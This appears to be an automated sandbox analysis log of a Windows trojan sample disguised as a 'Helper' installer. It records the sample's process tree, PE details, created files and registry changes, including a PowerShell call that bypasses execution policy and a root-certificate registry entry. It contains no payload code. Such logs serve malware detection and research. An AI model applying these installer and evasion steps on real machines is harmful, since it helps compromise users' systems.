Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004729A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00528A2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0047EAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00374B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00378E20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0053CE19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00352EA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003711B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0054328A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003873A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0036F420
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003C7500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00379650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0038B720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00357480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00507900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0037F9F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Section loaded: lpk.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI69F0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\6766e2.msi
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: String function: 00359610 appears 121 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: String function: 00358190 appears 56 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: String function: 0035A140 appears 49 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: String function: 0035A6D0 appears 54 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0042A630 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_004B1D40 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_003C40A0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00378270 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00368280 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00368840 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00372C90 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0036EE70 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00364E60 GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0040EF50 NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0036EFE0 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00365580 SysFreeString,GetWindowLongW,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,NtdllDefWindowProc_W,SysFreeString
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00367B50 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00365BE0 NtdllDefWindowProc_W
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000000.368320326.0000000000641000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmp | Binary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmp | Binary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmp | Binary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770673546.0000000006390000.00000002.00000001.00040000.0000001E.sdmp | Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewininet.dllD vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Binary or memory string: OriginalFileNameHelper.exe. vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Binary or memory string: OriginalFilenamelzmaextractor.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Binary or memory string: OriginalFilenameAICustAct.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Binary or memory string: OriginalFilenamePrereq.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File created: C:\Users\user\AppData\Roaming\Helper Company LLC
Source: shi6220.tmp.0.dr | Binary string: oNrtCloneOpenPacket\Device\NameResTrk\Record3VtI
Source: classification engine | Classification label: mal50.troj.spyw.evad.winEXE@11/25@1/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0035A000 LoadResource,LockResource,SizeofResource
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E08B609454A113DDC10D91901CD8422B C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692672474 "
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A46D6CE3215E9284ACEDBCBDAD509E67
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File created: C:\Users\user\AppData\Local\Temp\shi6220.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0049E1F0 GetDiskFreeSpaceExW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_01
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | String found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ActionTarget`Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'CustomActionSET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot Installe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static file information: File size 7465048 > 1048576
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: certificate valid
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x256600
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI6B9A.tmp.1.dr
Source: Binary string: wininet.pdbUGP source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0036C230 push ecx; mov dword ptr [esp], ecx 0_2_0036C231
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0052097E push ecx; ret 0_2_00520991
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_0044CD60 push ecx; mov dword ptr [esp], 3F800000h 0_2_0044CE96
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Code function: 0_2_00481960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc
Source: shi6220.tmp.0.dr | Static PE information: 0x72F9C735 [Sun Feb 16 01:34:45 2031 UTC]
Source: shi6220.tmp.0.dr | Static PE information: section name: .wpp_sf
Source: shi6220.tmp.0.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File created: C:\Users\user\AppData\Local\Temp\MSI634A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6B3B.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6AAC.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | File created: C:\Users\user\AppData\Local\Temp\shi6220.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6B9A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI69F0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6D80.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI6AFB.tmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB Blob
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
